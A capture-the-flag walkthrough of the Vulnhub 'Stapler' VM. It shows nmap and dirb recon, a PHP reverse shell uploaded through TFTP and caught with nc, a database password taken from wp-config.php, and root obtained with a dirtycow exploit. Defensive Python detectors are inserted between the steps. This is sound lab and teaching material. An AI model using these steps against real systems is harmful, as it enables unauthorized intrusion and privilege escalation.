[Vulnhub] stapler - Walkthrough

Vulnhub URI: https://www.vulnhub.com/entry/stapler-1,150/

Victim: 192.168.56.103  
Attacker: 192.168.56.102  

I used the silliest way to root this VM, so don't laugh at me...


First, netdiscover -r 192.168.56.0/24 to find the victim's IP.
Then a quick nmap:

root@kali:~/vulnerhub/stapler# cat nmap.rst 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 11:49 EDT  
Nmap scan report for 192.168.56.103  
Host is up (-0.0050s latency).  
Not shown: 992 filtered ports  
PORT     STATE  SERVICE  
20/tcp   closed ftp-data  
21/tcp   open   ftp  
22/tcp   open   ssh  
53/tcp   open   domain  
80/tcp   open   http  
139/tcp  open   netbios-ssn  
666/tcp  open   doom  
3306/tcp open   mysql  
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 37.33 seconds  

Several ports are open; I checked port 80 first.

It looks like a vulnerable site, because it seems to just fetch files from the server and return them to the user.

nikto didn't return anything, but dirb gave me interesting entries:

root@kali:~/vulnerhub/stapler# dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt -X ,.php,.js,.html

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Thu Aug 24 15:20:57 2017  
URL_BASE: http://192.168.56.103/  
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt  
EXTENSIONS_LIST: (,.php,.js,.html) | ()(.php)(.js)(.html) [NUM = 4]

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/.bashrc (CODE:200|SIZE:3771)                           
+ http://192.168.56.103/.profile (CODE:200|SIZE:675)                           

(!) FATAL: Too many errors connecting to host
    (Possible cause: EMPTY REPLY FROM SERVER)

-----------------
END_TIME: Thu Aug 24 15:21:08 2017  
DOWNLOADED: 9600 - FOUND: 2  

Looks like the web content is served from a home directory.
I tried ../../../../../etc/passwd, .bash_history and .ssh/known_hosts, but none of them worked, which means it either restricts directory traversal or is just a trolling page.
Assuming it's the good case, if we could find a way to upload a file here we might be able to get a shell, or else prove it's a fake page.


By this time my nmap UDP scan had finished, and the result is promising:

root@kali:~/vulnerhub/stapler/note# nmap -Pn -sU 192.168.56.103

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 12:08 EDT  
Stats: 0:10:02 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan  
UDP Scan Timing: About 57.19% done; ETC: 12:25 (0:07:19 remaining)  
Nmap scan report for 192.168.56.103  
Host is up (0.00055s latency).  
Not shown: 995 closed ports  
PORT    STATE         SERVICE  
53/udp  open          domain  
68/udp  open|filtered dhcpc  
69/udp  open|filtered tftp  
137/udp open          netbios-ns  
138/udp open|filtered netbios-dgm  
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1100.98 seconds  

Look at that! tftp!

root@kali:~/vulnerhub/stapler# tftp  
tftp> connect 192.168.56.103  
tftp> get .bashrc  
Received 3888 bytes in 0.0 seconds  
tftp> put shell.php  
Sent 5688 bytes in 0.0 seconds  
tftp>  

Great!
Looks like the tftp root is the same directory as the port 80 web root, and I can upload a file to that path.

My shell.php is based on /usr/share/webshells/php/php-reverse-shell.php
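The upload above only works because the TFTP daemon shares its root with the web server and accepts write requests. From the defender's side the same event is visible in syslog: tftpd-hpa, when run verbosely, logs every transfer as "RRQ from <ip> filename <name>" or "WRQ from <ip> filename <name>". The script below is an added example (not part of this walkthrough or the VM) that parses such lines and raises an alert on every write request, escalating when the file name is a server-side script or attempts to traverse out of the root. The log lines are constructed for the example; the exact log format is assumed from tftpd-hpa's behaviour.

```python
import re
from collections import Counter

# Regex for the "RRQ/WRQ from <ip> filename <name>" lines tftpd-hpa writes to
# syslog when started with -v (format assumed; the sample lines below are
# constructed for this example, not taken from the VM).
LOG_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ in\.tftpd\[\d+\]: '
    r'(?P<op>RRQ|WRQ) from (?P<src>\d+\.\d+\.\d+\.\d+) filename (?P<name>\S+)'
)

# Extensions a web server would execute; a WRQ that drops one of these into a
# web-served TFTP root is exactly the upload seen in this walkthrough.
SCRIPT_EXTS = ('.php', '.phtml', '.cgi', '.pl', '.py', '.sh', '.jsp')

# Constructed sample log: one read, two writes from the same host, one
# traversal attempt and one benign-looking write from another host.
SAMPLE_LOG = """\
Aug 24 15:30:58 red in.tftpd[1434]: RRQ from 192.168.56.102 filename .bashrc
Aug 24 15:31:02 red in.tftpd[1434]: WRQ from 192.168.56.102 filename shell.php
Aug 24 15:31:40 red in.tftpd[1434]: RRQ from 192.168.56.50 filename pxelinux.0
Aug 24 15:32:11 red in.tftpd[1434]: WRQ from 192.168.56.102 filename ../wp-config.php
Aug 24 15:32:30 red in.tftpd[1434]: WRQ from 192.168.56.77 filename backup.bin
"""


def parse_tftp_log(text):
    """Return one dict per recognised tftpd line; unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def flag_writes(events):
    """Alert on every write request: a read-only TFTP root should never see
    one. Severity is raised when the name is a script or tries to traverse."""
    alerts = []
    for e in events:
        if e['op'] != 'WRQ':
            continue
        name = e['name']
        reasons = ['write request to TFTP root']
        if name.lower().endswith(SCRIPT_EXTS):
            reasons.append('server-side script extension')
        if '..' in name.split('/') or name.startswith('/'):
            reasons.append('path traversal attempt')
        severity = 'high' if len(reasons) > 1 else 'medium'
        alerts.append({'ts': e['ts'], 'src': e['src'], 'file': name,
                       'severity': severity, 'reasons': reasons})
    return alerts


def writers_by_source(alerts):
    """Count write requests per source address, useful for a quick triage."""
    return Counter(a['src'] for a in alerts)


if __name__ == '__main__':
    for a in flag_writes(parse_tftp_log(SAMPLE_LOG)):
        print(f"[{a['severity']:6}] {a['ts']} {a['src']} -> {a['file']}: "
              + ', '.join(a['reasons']))
```

The hardening that makes this alert rare is configuration rather than code: run tftpd without its create option (so it cannot create new files), do not point it at a directory that a web server also serves, and keep it chrooted to its own read-only directory.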

Time to receive the shell.

Go and visit http://192.168.56.103/shell.php, then the shell comes:

root@kali:~/vulnerhub/stapler# nc -l -p 9004  
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux  
 15:35:36 up  2:49,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
uid=1028(www) gid=1028(www) groups=1028(www)  
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd /home/www
$ ls -la
total 72  
drwxrwxrwx  2 www    www      4096 Aug 24 14:50 .  
drwxr-xr-x 32 root   root     4096 Jun  4  2016 ..  
-rw-r--r--  1 www    www       220 Sep  1  2015 .bash_logout
-rw-r--r--  1 www    www      3771 Sep  1  2015 .bashrc
-rw-r--r--  1 www    www       675 Sep  1  2015 .profile
-rw-r--r--  1 nobody nogroup  5496 Aug 24 15:31 shell.php

All right, the privilege escalation part.

Honestly, my first thought was to exploit overlayfs or use cowroot, because the kernel version is old. But I wanted to explore more before firing that bullet.

So I did some recon work.
/etc/passwd:

root:x:0:0:root:/root:/bin/zsh  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
lxd:x:106:65534::/var/lib/lxd/:/bin/false  
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false  
messagebus:x:108:111::/var/run/dbus:/bin/false  
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin  
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh  
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false  
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash  
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash  
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash  
AParnell:x:1004:1004::/home/AParnell:/bin/bash  
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash  
MBassin:x:1006:1006::/home/MBassin:/bin/bash  
JBare:x:1007:1007::/home/JBare:/bin/bash  
LSolum:x:1008:1008::/home/LSolum:/bin/bash  
IChadwick:x:1009:1009::/home/IChadwick:/bin/false  
MFrei:x:1010:1010::/home/MFrei:/bin/bash  
SStroud:x:1011:1011::/home/SStroud:/bin/bash  
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash  
JKanode:x:1013:1013::/home/JKanode:/bin/bash  
CJoo:x:1014:1014::/home/CJoo:/bin/bash  
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin  
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin  
JLipps:x:1017:1017::/home/JLipps:/bin/sh  
jamie:x:1018:1018::/home/jamie:/bin/sh  
Sam:x:1019:1019::/home/Sam:/bin/zsh  
Drew:x:1020:1020::/home/Drew:/bin/bash  
jess:x:1021:1021::/home/jess:/bin/bash  
SHAY:x:1022:1022::/home/SHAY:/bin/bash  
Taylor:x:1023:1023::/home/Taylor:/bin/sh  
mel:x:1024:1024::/home/mel:/bin/bash  
kai:x:1025:1025::/home/kai:/bin/sh  
zoe:x:1026:1026::/home/zoe:/bin/bash  
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash  
www:x:1028:1028::/home/www:  
postfix:x:112:118::/var/spool/postfix:/bin/false  
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false  
elly:x:1029:1029::/home/elly:/bin/bash  

I checked all of their home directories, but none has any interesting files.
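The listing above is the kind of thing an auditor reads with a checklist: which accounts can actually log in, which have an odd shell, and whether any field is empty. The following is an added example (mine, not the walkthrough author's) that parses /etc/passwd lines and reports those conditions; the excerpt embedded in it is a subset of the listing above. Note the www account: its shell field is empty, and per passwd(5) login then falls back to /bin/sh, so "no shell configured" does not mean "cannot log in".

```python
# Shells that mark an account as non-interactive.
NON_INTERACTIVE = {'/usr/sbin/nologin', '/bin/false', '/bin/sync'}

# Subset of the /etc/passwd listing above (the rest follows the same pattern).
PASSWD_EXCERPT = """\
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
www:x:1028:1028::/home/www:
elly:x:1029:1029::/home/elly:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; blank and comment lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            raise ValueError(f'line {lineno}: expected 7 fields, got {len(fields)}')
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({'name': name, 'pw': pw, 'uid': int(uid), 'gid': int(gid),
                        'gecos': gecos, 'home': home, 'shell': shell})
    return entries


def audit_passwd(entries):
    """Return (account, finding) pairs for the conditions an auditor checks."""
    findings = []
    seen_uid = {}
    for e in entries:
        if e['uid'] == 0 and e['name'] != 'root':
            findings.append((e['name'], 'extra uid-0 account'))
        if e['pw'] == '':
            findings.append((e['name'], 'empty password field (no password required)'))
        if e['shell'] == '':
            findings.append((e['name'], 'empty shell field, login falls back to /bin/sh'))
        elif (e['uid'] >= 1000 and e['uid'] != 65534
              and e['shell'] not in NON_INTERACTIVE):
            findings.append((e['name'], f"interactive shell {e['shell']}"))
        if e['uid'] in seen_uid:
            findings.append((e['name'], f"shares uid {e['uid']} with {seen_uid[e['uid']]}"))
        else:
            seen_uid[e['uid']] = e['name']
    return findings


def interactive_accounts(entries):
    """Names of the accounts that could be a target for password guessing over SSH."""
    return sorted(e['name'] for e in entries
                  if e['shell'] == '' or e['shell'] not in NON_INTERACTIVE)


if __name__ == '__main__':
    parsed = parse_passwd(PASSWD_EXCERPT)
    for account, finding in audit_passwd(parsed):
        print(f'{account:12} {finding}')
    print('interactive:', ', '.join(interactive_accounts(parsed)))
```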
netstat:

$ netstat -nplt
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1434/php  
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:666             0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -  
tcp6       0      0 :::139                  :::*                    LISTEN      -  
tcp6       0      0 :::53                   :::*                    LISTEN      -  
tcp6       0      0 :::22                   :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::445                  :::*                    LISTEN      -  

/var/www/:

$ pwd
/var/www/https
$ ls -la
total 460  
drwxr-xr-x 5 root root   4096 Jun  5  2016 .  
drwxr-xr-x 3 root root   4096 Jun  6  2016 ..  
drwxr-xr-x 2 root root   4096 Jun  3  2016 admin112233  
drwxr-xr-x 2 root root   4096 Jun  4  2016 announcements  
drwxr-xr-x 5 root root   4096 Jun  4  2016 blogblog  
-rw-r--r-- 1 root root 434538 Jun  3  2016 custom_400.html
-rw-r--r-- 1 root root     92 Jun  4  2016 .htaccess
-rw-r--r-- 1 root root     21 Jun  5  2016 index.html
-rw-r--r-- 1 root root     59 Jun  3  2016 robots.txt
$ cat robots.txt
User-agent: *  
Disallow: /admin112233/  
Disallow: /blogblog/  

Here I found something: the credentials for mysql.

$ cd blogblog
$ ls
index.php  
license.txt  
readme.html  
wordpress-4.2.1.tar.gz  
wp-activate.php  
wp-admin  
wp-blog-header.php  
wp-comments-post.php  
wp-config.php  
wp-config-sample.php  
wp-content  
wp-cron.php  
wp-includes  
wp-links-opml.php  
wp-load.php  
wp-login.php  
wp-mail.php  
wp-settings.php  
wp-signup.php  
wp-trackback.php  
xmlrpc.php  
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');  
define('DB_USER', 'root');  
define('DB_PASSWORD', 'plbkac');  
define('DB_HOST', 'localhost');  
define('DB_CHARSET', 'utf8mb4');  
define('DB_COLLATE', '');  
$ 
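Two things make the wp-config.php above dangerous rather than merely untidy: it is readable by every local account (-rw-r--r--, so the unprivileged www user can read it), and the credentials it holds are for the database root user on a server that, per the netstat output, listens on 0.0.0.0:3306. Below is an added example (not the walkthrough's or WordPress's own code) that scans a directory tree for config files holding a DB_PASSWORD definition and reports whether each is readable by "other", without ever printing the secret itself. It builds its own throwaway fixture with a constructed, non-real password so it runs offline.

```python
import os
import re
import stat
import tempfile

# WordPress-style define('KEY', 'value') lines we care about.
SECRET_RE = re.compile(r"""define\(\s*'(DB_PASSWORD|DB_USER)'\s*,\s*'([^']*)'\s*\)""")
CONFIG_EXTS = ('.php', '.ini', '.cnf', '.env')


def readable_by_others(path):
    """True if the 'other' read bit is set, i.e. any local account can read it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def scan_tree(root):
    """Walk root and report config files that define DB_PASSWORD.
    The value is deliberately never stored or returned."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.endswith(CONFIG_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, errors='replace') as fh:
                    text = fh.read()
            except OSError:
                continue
            keys = [k for k, _value in SECRET_RE.findall(text)]
            if 'DB_PASSWORD' in keys:
                findings.append({
                    'path': os.path.relpath(path, root),
                    'mode': oct(stat.S_IMODE(os.stat(path).st_mode)),
                    'db_user_is_root': ('DB_USER', 'root') in SECRET_RE.findall(text),
                    'world_readable': readable_by_others(path),
                })
    return findings


def build_fixture():
    """Create a temporary tree with one weak and one hardened config file.
    Constructed for this example; the password is not a real one."""
    root = tempfile.mkdtemp(prefix='wpaudit-')
    site = os.path.join(root, 'blogblog')
    os.makedirs(site)
    weak = os.path.join(site, 'wp-config.php')
    with open(weak, 'w') as fh:
        fh.write("<?php\ndefine('DB_USER', 'root');\n"
                 "define('DB_PASSWORD', 'example-not-real');\n")
    os.chmod(weak, 0o644)   # the weak setting: readable by every local account
    hardened = os.path.join(site, 'wp-config-sample.php')
    with open(hardened, 'w') as fh:
        fh.write("<?php\ndefine('DB_USER', 'wp_app');\n"
                 "define('DB_PASSWORD', 'password_here');\n")
    os.chmod(hardened, 0o640)  # hardened: owner and web-server group only
    return root


if __name__ == '__main__':
    for f in scan_tree(build_fixture()):
        flag = 'WORLD-READABLE' if f['world_readable'] else 'ok'
        print(f"{f['path']:32} {f['mode']}  root-db-user={f['db_user_is_root']}  {flag}")
```

The fix on a real host is the 0o640 case: make the file owned by root with the web server's group as group owner, and give the application its own low-privilege database user instead of root.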

So login to mysql:

root@kali:~/vulnerhub/stapler# mysql -h 192.168.56.103 -u root -p  
Enter password:  
Welcome to the MariaDB monitor.  Commands end with ; or \g.  
Your MySQL connection id is 11  
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;  
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.00 sec)  

There are many usernames and passwords inside those DBs, but I'm not sure which of them are for SSH.
At this point I went back to the reverse shell and tried the traditional way:

$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null
/var/mail
/var/local
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/newgidmap
/usr/bin/ssh-agent
/usr/bin/chage
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/wall
/usr/bin/crontab
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/bin/screen
/usr/local/share/fonts
/usr/local/share/zsh/site-functions
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/entities
/usr/local/share/sgml/misc
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/entities
/usr/local/share/xml/misc
/usr/local/share/xml/declaration
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/i386-linux-gnu/utempter/utempter
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/usr/sbin/postqueue
/usr/sbin/postdrop
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/su
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
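Reading a raw setuid/setgid list by eye, as above, is how an attacker finds the odd one out; a defender does the same thing by diffing against a known-good snapshot. Note that `-perm /6000` without `-type f` also matches setgid directories, which is why /var/mail and the /usr/local/share entries appear in the list. The example below is added here and is not part of the walkthrough: it takes two snapshots in the format produced by `find / -xdev -type f -perm /6000 -printf '%m %u %p\n'` (octal mode, owner, path), reports entries that are new, changed, or missing, and additionally flags any setuid-root file living outside the system binary directories. Both snapshots are constructed; the paths are a subset of the listing above plus one planted entry to show what the check catches.

```python
# Directories where setuid-root binaries are expected to live.
TRUSTED_PREFIXES = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/',
                    '/usr/lib/', '/usr/libexec/')

# Constructed "known good" snapshot, e.g. taken right after the build.
BASELINE = """\
4755 root /usr/bin/sudo
4755 root /usr/bin/passwd
4755 root /usr/bin/chsh
2755 root /usr/bin/wall
4755 root /bin/su
4755 root /bin/mount
4755 root /usr/lib/openssh/ssh-keysign
"""

# Constructed "current" snapshot: the same files plus screen, the two postfix
# setgid helpers, and a planted setuid file in /var/tmp.
CURRENT = """\
4755 root /usr/bin/sudo
4755 root /usr/bin/passwd
4755 root /usr/bin/chsh
2755 root /usr/bin/wall
4755 root /bin/su
4755 root /bin/mount
4755 root /usr/lib/openssh/ssh-keysign
4755 root /usr/bin/screen
2555 root /usr/sbin/postqueue
2555 root /usr/sbin/postdrop
4755 root /var/tmp/.cache/helper
"""


def parse_snapshot(text):
    """Map path -> {'mode': int, 'owner': str} from '%m %u %p' lines."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        mode, owner, path = line.split(' ', 2)   # path may contain spaces
        entries[path] = {'mode': int(mode, 8), 'owner': owner}
    return entries


def audit_suid(baseline, current):
    """Return (path, finding) pairs comparing current against baseline."""
    findings = []
    for path, info in sorted(current.items()):
        is_suid = bool(info['mode'] & 0o4000)
        kind = 'setuid' if is_suid else 'setgid'
        if path not in baseline:
            findings.append((path, f'new {kind} file not in baseline'))
        elif baseline[path] != info:
            findings.append((path, 'mode or owner changed since baseline'))
        if is_suid and info['owner'] == 'root' and not path.startswith(TRUSTED_PREFIXES):
            findings.append((path, 'setuid-root outside system binary directories'))
        if info['mode'] & 0o002:
            findings.append((path, 'world-writable privileged file'))
    for path in sorted(set(baseline) - set(current)):
        findings.append((path, 'present in baseline but missing now'))
    return findings


if __name__ == '__main__':
    for path, finding in audit_suid(parse_snapshot(BASELINE), parse_snapshot(CURRENT)):
        print(f'{path:36} {finding}')
```

On a real host the two snapshots would come from the same find command run at build time and at audit time; the planted /var/tmp entry is the case a plain list comparison would also catch, while the location check catches it even when no baseline exists.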

Here I saw two files: postqueue and postdrop. I googled them, and it turns out they belong to the postfix service, which also showed up in /etc/passwd.
I searched for an exploit for it and found one, https://www.exploit-db.com/exploits/6337/
But it didn't work, because I do not have write permission to /var/mail:

$ ./epl.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[!] Spool dir is not writable

And that dir belongs to www-data, but I was logged in as www.

$ ls -l /var/mail     
total 48  
-rw-r--r-- 1 root     mail     1 Jun  4  2016 root
-rw------- 1 www-data mail 39991 Jun  5  2016 www-data
$ whoami
www  

All I need is -data :D
So I was wondering if I could start some web service, get a reverse shell as www-data and then use this exploit.
Or, if I found a way to SSH in as another user, maybe another path would be waiting for me.

So at this point I started trying those kernel exploits. :D
First I tried overlayfs, but it's not vulnerable. Then I tried cowroot and went back to mysql to search for more information without checking the result (I thought it was stuck! Seriously.)

I did find many hashed passwords and messages inside the DB, but I couldn't crack them with john in a short time.

While I was cracking those passwords, I went back to the 'stuck' reverse shell and typed something:

$ ./cowroot
whoami  
root  
cd /root  
ls  
fix-wordpress.sh  
flag.txt  
issue  
python.sh  
wordpress.sql  
cat flag.txt  
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b  

Oh my. Happiness came when I wasn't prepared for it.


Other things

Besides that, I also tried the other ports.
From port 666 I got a message2.jpg (the image is not reproduced here).
And also:

root@kali:~/vulnerhub/stapler/message# steghide --info message2.jpg  
"message2.jpg":
  format: jpeg
  capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y  
Enter passphrase:  
steghide: could not extract any data with that passphrase!  

I haven't figured out the passphrase yet.

(please check the previous part for root and flag)


Again, dirtycow is really powerful.

There are other ways to get a reverse shell and root it; I believe those are more interesting.

Thanks g0tmi1k for providing this good practice.